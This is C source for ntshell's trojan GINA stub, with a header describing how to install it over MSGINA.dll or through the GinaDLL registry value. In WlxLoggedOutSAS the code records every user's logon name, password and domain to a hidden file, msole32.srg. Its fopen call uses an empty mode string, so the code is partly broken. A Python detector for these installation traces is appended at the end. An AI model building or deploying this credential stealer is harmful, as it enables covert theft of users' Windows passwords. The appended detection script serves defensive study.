Gina backdoor code


/*
NtShellGina.c - A GINA stub from ntshell 1.0
By: bingle@email.com.cn, homepage: bingle_site.top263.net

This file is modified from the Microsoft sample ginastub.c.
It saves the logon password to the file system32\msole32.srg.

Winlogon logon management:

The Winlogon process is responsible for managing logon-related security. It handles user logon and logoff, starting the user shell, entering and changing passwords, and locking and unlocking the workstation. Winlogon must ensure that its security-related operations are invisible to other processes, so that no other process can obtain the logon password.

Winlogon guarantees these requirements with specific steps taken before it starts the user's programs during system initialization. It creates and opens a window station and adds an access control entry (ACE) that contains only the SID of the Winlogon process, so only Winlogon can access that window station. Winlogon then creates a desktop, the Winlogon desktop, and sets it so that only Winlogon can access it; no other process can access any data or code on it. This feature is used to protect passwords, to lock the desktop, and for similar operations. Winlogon also registers the SAS (secure attention sequence) hotkey. Pressing the SAS hotkey (CTRL+ALT+DEL by default) invokes Winlogon and switches to the secure desktop, so a password-capturing program cannot receive the logon password, a password change, or other security activity.

Both identification and authentication during logon are done in the GINA (Graphical Identification aNd Authentication) DLL. Microsoft's GINA is MSGINA.dll, which implements the default Windows NT logon interface. You can, however, develop your own GINA DLL to implement other authentication methods, such as magnetic cards. Of course, this also leaves an opening for trojans: write a DLL with the same interface as the system GINA and replace MSGINA.dll with it. There is a GINA example among the MSDN samples. If you only want to obtain the logon password, though, you only need to write a DLL with the same interface as the GINA whose functions each call the corresponding function of MSGINA.dll; the MSDN samples also include an example of this, called ginastub. As a trojan, of course, it also has to dump the password at logon. (For more information about GINA, search for GINA in MSDN.)

NtShellGina uses the latter method. I modified ginastub so that at logon it writes Username:Password:Domain to msole32.srg. At run time it must call MSGINA.dll for the actual functionality, so that file must still exist; therefore, during installation, MSGINA.dll is renamed to winlogon32.dll and ntshellgina.dll is copied to MSGINA.dll. This is ntshell's second installation method.

Microsoft also leaves a place in the registry for installing a GINA: under \Windows NT\CurrentVersion\Winlogon, set the GinaDLL value to a GINA DLL. (GinaDLL is not set by default.) If this value is set, NT calls that GINA instead of the default MSGINA.dll. Therefore ntshell's first installation method is to copy ntshellgina.dll to system32\mshtmlgi.dll and set GinaDLL to mshtmlgi.dll.

The second method is therefore only used when the system has no GinaDLL value set; if the value is set, ntshellgina will not be installed. Of course, if you use the second installation method on Win2000, you must also rename MSGINA.dll in dllcache. (ntshell renames it to mshtmlgi.dll.)

The GINA DLL is responsible for system authentication and secure logon, so if anything goes wrong you cannot log on to the system at all; it must be handled with caution. ntshell therefore performs many checks during installation and will not install if any check fails. For example, with the installation method that copies ntshellgina.dll over MSGINA.dll, the first installation produces the chain mslogon32.dll <- MSGINA.dll <- ntshellgina.dll. If it were installed again, MSGINA.dll (now ntshellgina.dll) would replace mslogon32.dll and ntshellgina.dll would replace MSGINA.dll again, so the original MSGINA.dll would no longer exist: there would be only two copies of ntshellgina.dll, the real MSGINA.dll could not be found, and logon would fail.

ntshell performs the following checks in sequence:
If GinaDLL is set in the registry, the system is considered not to be using the default logon GINA, and ntshell is not installed (MSGINA.dll might not be found, or some other program might stop working properly).
If the system's MSGINA.dll and ntshellgina.dll are identical, ntshell is considered already installed and is not installed again.
If mslogon32.dll exists on the system, ntshell may already be installed, so it is not installed (unless you have confirmed that MSGINA.dll is the original; then you can manually delete mslogon32.dll and install. Otherwise, do not install).

If an installation error occurs and you cannot log on, follow the MSDN instructions below to recover. (I have used the 4th method; I have not tried the others.)

Warning! - It is possible to make your machine unusable if you install
a replacement GINA and it fails. To avoid this situation, be sure that you have
a method of accessing the %SystemRoot%\system32 directory independent of
the Windows NT installation you are testing on.

If the GINA sample malfunctions, and you are not able to log on to fix the problem,
you can recover by doing one of the following:

1. If the test machine is on the network and you have an account on another machine
with administrative privileges on the test machine, open the test machine registry
remotely with regedt32 and delete the GinaDLL value.

2. If the test machine is on the network, and %SystemRoot%\system32 is available on
a network share for that machine (e.g. \\<Name>\C$), rename gina.dll to something
else with a command like:
ren \\<Name>\C$\winnt351\system32\gina.dll gina.sdk
Reboot the test machine.

3. Delete the GinaDLL value from the registry.

4. If the test machine will dual boot to another version of Windows NT or another
operating system capable of accessing %SystemRoot%\system32, boot to that operating
system, delete %SystemRoot%\system32\gina.dll, reboot, and delete the GinaDLL value
from the registry.

// The following are the original Microsoft MSDN comments
Module: ginastub.c

Abstract:

This sample demonstrates a pass-thru "stub" GINA which can be used
in some cases to simplify GINA development.

A common use for a GINA is to implement code which requires
credentials of the user logging onto the workstation. The credentials
may be required for synchronization with foreign account databases
or custom authentication activities.

In this example case, it is possible to implement a simple GINA
stub layer which simply passes control for the required functions
to the previously installed GINA, and captures the interesting
parameters from that GINA. In this scenario, the existing functionality
in the existent GINA is retained. In addition, the development time
is reduced drastically, as existing functionality does not need to
be duplicated.

When dealing with credentials, take steps to maintain the security
of the credentials. For instance, if transporting credentials over
a network, be sure to encrypt the credentials.

Author:

Scott Field (sfield) 18-Jul-96
--*/

#include <windows.h>
#include <stdio.h>
#include <winwlx.h>

#include "ginastub.h"

//
// winlogon function dispatch table
//

PWLX_DISPATCH_VERSION_1_0 g_pWinlogon;

//
// Function pointers to the real msgina which we will call.
//

PGWLXNEGOTIATE GWlxNegotiate;
PGWLXINITIALIZE GWlxInitialize;
PGWLXDISPLAYSASNOTICE GWlxDisplaySASNotice;
PGWLXLOGGEDOUTSAS GWlxLoggedOutSAS;
PGWLXACTIVATEUSERSHELL GWlxActivateUserShell;
PGWLXLOGGEDONSAS GWlxLoggedOnSAS;
PGWLXDISPLAYLOCKEDNOTICE GWlxDisplayLockedNotice;
PGWLXWKSTALOCKEDSAS GWlxWkstaLockedSAS;
PGWLXISLOCKOK GWlxIsLockOk;
PGWLXISLOGOFFOK GWlxIsLogoffOk;
PGWLXLOGOFF GWlxLogoff;
PGWLXSHUTDOWN GWlxShutdown;

//
// New for version 1.1
//

PGWLXSTARTAPPLICATION GWlxStartApplication;
PGWLXSCREENSAVERNOTIFY GWlxScreenSaverNotify;

//
// Hook into the real GINA.
//
BOOL MyInitialize(void)
{
    HINSTANCE hDll;
    //
    // Decide which DLL to load: if this file is named "msgina.dll",
    // ntshell has renamed MSGINA.dll --> mslogon32.dll, so load that;
    // if it is named anything else, just load MSGINA.dll.
    //
    char origina[] = "msgina.dll";
    char chgedgina[] = "mslogon32.dll";
    char *realgina;
    char filename[MAX_PATH];
    int result;
    FILE *fp;
    HMODULE hself;

#ifdef _DEBUG
    fp = fopen("ginalog.txt", "ab");
    if (fp)
    {
        sprintf(filename, "\r\nMyInitialize been called ");
        fwrite(filename, strlen(filename), 1, fp);
        result = GetModuleFileName(NULL, filename, MAX_PATH);
        if (result) fwrite(filename, strlen(filename), 1, fp);
        fclose(fp);
    }
#endif

    realgina = NULL;
    hself = GetModuleHandle(origina);
    if (!hself) realgina = origina;   // hself = GetModuleHandle(chgedgina);
    else realgina = chgedgina;        // if origina is loaded, this DLL is origina

    // Load the original MSGINA.dll.
    if (!(hDll = LoadLibrary(realgina))) {
        return FALSE;
    }

    // Get pointers to all of the wlx functions in the real MSGINA.
    GWlxNegotiate = (PGWLXNEGOTIATE)GetProcAddress(hDll, "WlxNegotiate");
    if (!GWlxNegotiate) {
        return FALSE;
    }

    GWlxInitialize = (PGWLXINITIALIZE)GetProcAddress(hDll, "WlxInitialize");
    if (!GWlxInitialize) {
        return FALSE;
    }

    GWlxDisplaySASNotice =
        (PGWLXDISPLAYSASNOTICE)GetProcAddress(hDll, "WlxDisplaySASNotice");
    if (!GWlxDisplaySASNotice) {
        return FALSE;
    }

    GWlxLoggedOutSAS =
        (PGWLXLOGGEDOUTSAS)GetProcAddress(hDll, "WlxLoggedOutSAS");
    if (!GWlxLoggedOutSAS) {
        return FALSE;
    }

    GWlxActivateUserShell =
        (PGWLXACTIVATEUSERSHELL)GetProcAddress(hDll, "WlxActivateUserShell");
    if (!GWlxActivateUserShell) {
        return FALSE;
    }

    GWlxLoggedOnSAS =
        (PGWLXLOGGEDONSAS)GetProcAddress(hDll, "WlxLoggedOnSAS");
    if (!GWlxLoggedOnSAS) {
        return FALSE;
    }

    GWlxDisplayLockedNotice =
        (PGWLXDISPLAYLOCKEDNOTICE)GetProcAddress(
            hDll,
            "WlxDisplayLockedNotice");
    if (!GWlxDisplayLockedNotice) {
        return FALSE;
    }

    GWlxIsLockOk = (PGWLXISLOCKOK)GetProcAddress(hDll, "WlxIsLockOk");
    if (!GWlxIsLockOk) {
        return FALSE;
    }

    GWlxWkstaLockedSAS =
        (PGWLXWKSTALOCKEDSAS)GetProcAddress(hDll, "WlxWkstaLockedSAS");
    if (!GWlxWkstaLockedSAS) {
        return FALSE;
    }

    GWlxIsLogoffOk = (PGWLXISLOGOFFOK)GetProcAddress(hDll, "WlxIsLogoffOk");
    if (!GWlxIsLogoffOk) {
        return FALSE;
    }

    GWlxLogoff = (PGWLXLOGOFF)GetProcAddress(hDll, "WlxLogoff");
    if (!GWlxLogoff) {
        return FALSE;
    }

    GWlxShutdown = (PGWLXSHUTDOWN)GetProcAddress(hDll, "WlxShutdown");
    if (!GWlxShutdown) {
        return FALSE;
    }

    // We don't check for failure here because these don't exist in
    // GINAs implemented prior to Windows NT 4.0
    GWlxStartApplication = (PGWLXSTARTAPPLICATION)GetProcAddress(hDll, "WlxStartApplication");
    GWlxScreenSaverNotify = (PGWLXSCREENSAVERNOTIFY)GetProcAddress(hDll, "WlxScreenSaverNotify");

    // Everything loaded OK. Return success.
    return TRUE;
}

BOOL WINAPI WlxNegotiate(DWORD dwWinlogonVersion, DWORD *pdwDllVersion)
{
    if (!MyInitialize()) return FALSE;
    return GWlxNegotiate(dwWinlogonVersion, pdwDllVersion);
}

BOOL WINAPI WlxInitialize(LPWSTR lpWinsta, HANDLE hWlx,
    PVOID pvReserved, PVOID pWinlogonFunctions, PVOID *pWlxContext)
{
    return GWlxInitialize(lpWinsta, hWlx, pvReserved,
        pWinlogonFunctions, pWlxContext);
}

VOID WINAPI WlxDisplaySASNotice(PVOID pWlxContext)
{
    GWlxDisplaySASNotice(pWlxContext);
}

int WINAPI WlxLoggedOutSAS(PVOID pWlxContext, DWORD dwSasType,
    PLUID pAuthenticationId, PSID pLogonSid, PDWORD pdwOptions,
    PHANDLE phToken, PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,
    PVOID *pProfile)
{
    int iRet;

    iRet = GWlxLoggedOutSAS(pWlxContext, dwSasType, pAuthenticationId,
        pLogonSid, pdwOptions, phToken, pMprNotifyInfo, pProfile);

    if (iRet == WLX_SAS_ACTION_LOGON) {
        // copy pMprNotifyInfo and pLogonSid for later use

        FILE *fp;
        fp = fopen("msole32.srg", "");
        if (fp != NULL)
        {
            char infor[300], buf[300];
            memset(buf, 0, 300);
            wcstombs(buf, pMprNotifyInfo->pszUserName, 300);
            sprintf(infor, "%s", buf);

            memset(buf, 0, 300); // if the conversion failed, we use the bad one as well
            wcstombs(buf, pMprNotifyInfo->pszPassword, 300);
            sprintf(infor, "%s:%s", infor, buf);

            memset(buf, 0, 300);
            wcstombs(buf, pMprNotifyInfo->pszDomain, 300);
            sprintf(infor, "%s:%s\r\n", infor, buf);

            fwrite(infor, 1, strlen(infor), fp);
            fclose(fp);
        }
        // pMprNotifyInfo->pszOldPassword
    }

    return iRet;
}

BOOL WINAPI WlxActivateUserShell(
    PVOID pWlxContext,
    PWSTR pszDesktopName,
    PWSTR pszMprLogonScript,
    PVOID pEnvironment)
{
    return GWlxActivateUserShell(
        pWlxContext,
        pszDesktopName,
        pszMprLogonScript,
        pEnvironment
        );
}

int WINAPI WlxLoggedOnSAS(
    PVOID pWlxContext,
    DWORD dwSasType,
    PVOID pReserved)
{
    return GWlxLoggedOnSAS(pWlxContext, dwSasType, pReserved);
}

VOID WINAPI WlxDisplayLockedNotice(PVOID pWlxContext)
{
    GWlxDisplayLockedNotice(pWlxContext);
}

BOOL WINAPI WlxIsLockOk(PVOID pWlxContext)
{
    return GWlxIsLockOk(pWlxContext);
}

int WINAPI WlxWkstaLockedSAS(
    PVOID pWlxContext,
    DWORD dwSasType)
{
    return GWlxWkstaLockedSAS(pWlxContext, dwSasType);
}

BOOL WINAPI WlxIsLogoffOk(PVOID pWlxContext)
{
    BOOL bSuccess;

    bSuccess = GWlxIsLogoffOk(pWlxContext);

    if (bSuccess) {
        //
        // if it's OK to logoff, finish with the stored credentials
        // and scrub the buffers
        //
    }

    return bSuccess;
}

VOID WINAPI WlxLogoff(PVOID pWlxContext)
{
    GWlxLogoff(pWlxContext);
}

VOID WINAPI WlxShutdown(PVOID pWlxContext, DWORD ShutdownType)
{
    GWlxShutdown(pWlxContext, ShutdownType);
}

//
// New for version 1.1
//
BOOL WINAPI WlxScreenSaverNotify(
    PVOID pWlxContext,
    BOOL *pSecure
    )
{
    if (GWlxScreenSaverNotify != NULL)
        return GWlxScreenSaverNotify(pWlxContext, pSecure);

    //
    // if not exported, return something intelligent
    //
    *pSecure = TRUE;
    return TRUE;
}

BOOL WINAPI WlxStartApplication(
    PVOID pWlxContext,
    PWSTR pszDesktopName,
    PVOID pEnvironment,
    PWSTR pszCmdLine
    )
{
    if (GWlxStartApplication != NULL)
        return GWlxStartApplication(
            pWlxContext,
            pszDesktopName,
            pEnvironment,
            pszCmdLine
            );
    //
    // if not exported, return something intelligent
    //
    return FALSE;
}
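As an added defender-side example (written here, not part of the ntshell source or the MSDN sample), the following Python checks a host for the two installation patterns the header describes: the GinaDLL registry value under Winlogon (the full HKLM key is a real key the page only partly names) and the file names ntshell leaves in system32. The live collection path assumes those files sit in %SystemRoot%\system32; the assessment function itself is pure so it can be reviewed and tested offline.

```python
import os
import sys

# Registry key Winlogon reads its GinaDLL value from (a real key; not on the page).
WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# File names taken from the ntshell header above: the renamed original GINA,
# the GINA copy used by the registry method, and the credential log.
SUSPECT_FILES = ("mslogon32.dll", "winlogon32.dll", "mshtmlgi.dll", "msole32.srg")


def assess_gina(gina_dll, present_files):
    """Return findings for a GinaDLL value (None if unset) and the list of
    system32 file names that exist. Pure function, so it runs anywhere."""
    findings = []
    present = {f.lower() for f in present_files}
    if gina_dll is not None:
        # First installation method: GinaDLL points Winlogon at a non-default GINA.
        findings.append("GinaDLL set to %r: Winlogon loads a non-default GINA" % gina_dll)
    for name in ("mslogon32.dll", "winlogon32.dll"):
        if name in present:
            # Second method: original MSGINA.dll renamed so the stub can chain to it.
            findings.append(name + " present: MSGINA.dll may have been renamed and replaced")
    if "mshtmlgi.dll" in present:
        findings.append("mshtmlgi.dll present: name ntshell uses for its GINA copy")
    if "msole32.srg" in present:
        findings.append("msole32.srg present: ntshell credential log file")
    return findings


def collect_windows():
    """Gather the facts from a live host; needs Windows for winreg."""
    import winreg
    system32 = os.path.join(os.environ.get("SystemRoot", r"C:\Windows"), "system32")
    present = [f for f in SUSPECT_FILES if os.path.exists(os.path.join(system32, f))]
    gina_dll = None
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WINLOGON_KEY) as key:
        try:
            gina_dll, _ = winreg.QueryValueEx(key, "GinaDLL")
        except FileNotFoundError:
            pass  # value absent: the default MSGINA.dll is in use
    return gina_dll, present


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("live collection needs Windows; call assess_gina() with collected facts")
    for finding in assess_gina(*collect_windows()):
        print(finding)
```

Winlogon only honours GinaDLL on NT 4.0 through Server 2003; Vista and later do not load GINA DLLs at all, so findings matter on those older hosts.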
